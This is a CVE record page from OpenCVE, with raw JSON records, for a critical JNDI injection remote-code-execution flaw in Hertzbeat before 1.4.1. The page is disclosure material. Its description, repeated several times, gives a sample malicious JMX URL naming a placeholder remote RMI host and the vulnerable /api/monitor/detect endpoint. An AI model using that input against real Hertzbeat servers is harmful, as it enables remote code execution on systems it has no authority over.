CVE-2023-51653 - Vulnerability Details - OpenCVE

Hertzbeat is a real-time monitoring system. In the implementation of `JmxCollectImpl.java`, `JMXConnectorFactory.connect` is vulnerable to JNDI injection. The corresponding interface is `/api/monitor/detect`. If there is a URL field, the address will be used by default. When the URL is `service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari`, it can be exploited to cause remote code execution. Version 1.4.1 contains a fix for this issue.

No CVSS v4.0

Attack Vector Network

Attack Complexity Low

Privileges Required None

Scope Unchanged

Confidentiality Impact High

Integrity Impact High

Availability Impact High

User Interaction None

No CVSS v3.0

No CVSS v2

This CVE is not in the KEV list.

Key SSVC decision points have not yet been added.

Vendors	Products
Apache	Hertzbeat

Configuration 1 [-]

cpe:2.3:a:apache:hertzbeat:*:*:*:*:*:*:*:*

No data.

References

Link	Providers
https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef
https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg

History

Thu, 16 Jan 2025 19:30:00 +0000

Type	Values Removed	Values Added
First Time appeared		Apache Apache hertzbeat
CPEs		cpe:2.3:a:apache:hertzbeat::::::::
Vendors & Products		Apache Apache hertzbeat

MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published: 2024-02-22T15:39:49.280Z

Updated: 2024-08-02T22:40:34.196Z

Reserved: 2023-12-20T22:12:04.737Z

Link: CVE-2023-51653

Vulnrichment

Updated: 2024-08-02T22:40:34.196Z

NVD

Status : Analyzed

Published: 2024-02-22T16:15:53.800

Modified: 2025-01-16T19:04:56.533

Link: CVE-2023-51653

Redhat

No data.

{"dataType": "CVE_RECORD", "dataVersion": "5.1", "cveMetadata": {"cveId": "CVE-2023-51653", "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "state": "PUBLISHED", "assignerShortName": "GitHub_M", "dateReserved": "2023-12-20T22:12:04.737Z", "datePublished": "2024-02-22T15:39:49.280Z", "dateUpdated": "2024-08-02T22:40:34.196Z"}, "containers": {"cna": {"title": "Hertzbeat JMX JNDI RCE", "problemTypes": [{"descriptions": [{"cweId": "CWE-74", "lang": "en", "description": "CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')", "type": "CWE"}]}], "metrics": [{"cvssV3_1": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}}], "references": [{"name": "https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg", "tags": ["x_refsource_CONFIRM"], "url": "https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg"}, {"name": "https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef", "tags": ["x_refsource_MISC"], "url": "https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef"}], "affected": [{"vendor": "dromara", "product": "hertzbeat", "versions": [{"version": "< 1.4.1", "status": "affected"}]}], "providerMetadata": {"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M", "dateUpdated": "2024-02-22T15:39:49.280Z"}, "descriptions": [{"lang": "en", "value": "Hertzbeat is a real-time monitoring system. In the implementation of `JmxCollectImpl.java`, `JMXConnectorFactory.connect` is vulnerable to JNDI injection. The corresponding interface is `/api/monitor/detect`. If there is a URL field, the address will be used by default. When the URL is `service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari`, it can be exploited to cause remote code execution. Version 1.4.1 contains a fix for this issue."}], "source": {"advisory": "GHSA-gcmp-vf6v-59gg", "discovery": "UNKNOWN"}}, "adp": [{"affected": [{"vendor": "dromara", "product": "hertzbeat", "cpes": ["cpe:2.3:a:dromara:hertzbeat:1.4.1:*:*:*:*:*:*:*"], "defaultStatus": "unknown", "versions": [{"version": "0", "status": "affected", "lessThan": "1.4.1", "versionType": "custom"}]}], "metrics": [{"other": {"type": "ssvc", "content": {"timestamp": "2024-02-23T18:07:08.817204Z", "id": "CVE-2023-51653", "options": [{"Exploitation": "none"}, {"Automatable": "yes"}, {"Technical Impact": "total"}], "role": "CISA Coordinator", "version": "2.0.3"}}}], "title": "CISA ADP Vulnrichment", "providerMetadata": {"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP", "dateUpdated": "2024-07-25T18:12:39.492Z"}}, {"providerMetadata": {"orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE", "dateUpdated": "2024-08-02T22:40:34.196Z"}, "title": "CVE Program Container", "references": [{"name": "https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg", "tags": ["x_refsource_CONFIRM", "x_transferred"], "url": "https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg"}, {"name": "https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef", "tags": ["x_refsource_MISC", "x_transferred"], "url": "https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef"}]}]}}

{"dataType": "CVE_RECORD", "containers": {"adp": [{"title": "CVE Program Container", "references": [{"url": "https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg", "name": "https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg", "tags": ["x_refsource_CONFIRM", "x_transferred"]}, {"url": "https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef", "name": "https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef", "tags": ["x_refsource_MISC", "x_transferred"]}], "providerMetadata": {"orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE", "dateUpdated": "2024-08-02T22:40:34.196Z"}}, {"title": "CISA ADP Vulnrichment", "metrics": [{"other": {"type": "ssvc", "content": {"id": "CVE-2023-51653", "role": "CISA Coordinator", "options": [{"Exploitation": "none"}, {"Automatable": "yes"}, {"Technical Impact": "total"}], "version": "2.0.3", "timestamp": "2024-02-23T18:07:08.817204Z"}}}], "affected": [{"cpes": ["cpe:2.3:a:dromara:hertzbeat:1.4.1:*:*:*:*:*:*:*"], "vendor": "dromara", "product": "hertzbeat", "versions": [{"status": "affected", "version": "0", "lessThan": "1.4.1", "versionType": "custom"}], "defaultStatus": "unknown"}], "providerMetadata": {"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP", "dateUpdated": "2024-07-25T18:12:24.005Z"}}], "cna": {"title": "Hertzbeat JMX JNDI RCE", "source": {"advisory": "GHSA-gcmp-vf6v-59gg", "discovery": "UNKNOWN"}, "metrics": [{"cvssV3_1": {"scope": "UNCHANGED", "version": "3.1", "baseScore": 9.8, "attackVector": "NETWORK", "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "integrityImpact": "HIGH", "userInteraction": "NONE", "attackComplexity": "LOW", "availabilityImpact": "HIGH", "privilegesRequired": "NONE", "confidentialityImpact": "HIGH"}}], "affected": [{"vendor": "dromara", "product": "hertzbeat", "versions": [{"status": "affected", "version": "< 1.4.1"}]}], "references": [{"url": "https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg", "name": "https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg", "tags": ["x_refsource_CONFIRM"]}, {"url": "https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef", "name": "https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef", "tags": ["x_refsource_MISC"]}], "descriptions": [{"lang": "en", "value": "Hertzbeat is a real-time monitoring system. In the implementation of `JmxCollectImpl.java`, `JMXConnectorFactory.connect` is vulnerable to JNDI injection. The corresponding interface is `/api/monitor/detect`. If there is a URL field, the address will be used by default. When the URL is `service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari`, it can be exploited to cause remote code execution. Version 1.4.1 contains a fix for this issue."}], "problemTypes": [{"descriptions": [{"lang": "en", "type": "CWE", "cweId": "CWE-74", "description": "CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')"}]}], "providerMetadata": {"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M", "dateUpdated": "2024-02-22T15:39:49.280Z"}}}, "cveMetadata": {"cveId": "CVE-2023-51653", "state": "PUBLISHED", "dateUpdated": "2024-08-02T22:40:34.196Z", "dateReserved": "2023-12-20T22:12:04.737Z", "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "datePublished": "2024-02-22T15:39:49.280Z", "assignerShortName": "GitHub_M"}, "dataVersion": "5.1"}

{"configurations": [{"nodes": [{"cpeMatch": [{"criteria": "cpe:2.3:a:apache:hertzbeat:*:*:*:*:*:*:*:*", "matchCriteriaId": "0B4E8400-424B-4FCB-81C8-5D559B146130", "versionEndExcluding": "1.4.1", "vulnerable": true}], "negate": false, "operator": "OR"}]}], "cveTags": [], "descriptions": [{"lang": "en", "value": "Hertzbeat is a real-time monitoring system. In the implementation of `JmxCollectImpl.java`, `JMXConnectorFactory.connect` is vulnerable to JNDI injection. The corresponding interface is `/api/monitor/detect`. If there is a URL field, the address will be used by default. When the URL is `service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari`, it can be exploited to cause remote code execution. Version 1.4.1 contains a fix for this issue."}, {"lang": "es", "value": "Hertzbeat es un sistema de monitorizaci\u00f3n en tiempo real. En la implementaci\u00f3n de `JmxCollectImpl.java`, `JMXConnectorFactory.connect` es vulnerable a la inyecci\u00f3n JNDI. La interfaz correspondiente es `/api/monitor/detect`. Si hay un campo URL, la direcci\u00f3n se utilizar\u00e1 de forma predeterminada. Cuando la URL es `service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari`, se puede explotar para provocar la ejecuci\u00f3n remota de c\u00f3digo. La versi\u00f3n 1.4.1 contiene una soluci\u00f3n para este problema."}], "id": "CVE-2023-51653", "lastModified": "2025-01-16T19:04:56.533", "metrics": {"cvssMetricV31": [{"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary"}, {"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary"}]}, "published": "2024-02-22T16:15:53.800", "references": [{"source": "security-advisories@github.com", "tags": ["Patch"], "url": "https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef"}, {"source": "security-advisories@github.com", "tags": ["Exploit", "Vendor Advisory"], "url": "https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg"}, {"source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Patch"], "url": "https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef"}, {"source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Vendor Advisory"], "url": "https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg"}], "sourceIdentifier": "security-advisories@github.com", "vulnStatus": "Analyzed", "weaknesses": [{"description": [{"lang": "en", "value": "CWE-74"}], "source": "security-advisories@github.com", "type": "Secondary"}, {"description": [{"lang": "en", "value": "CWE-74"}], "source": "nvd@nist.gov", "type": "Primary"}]}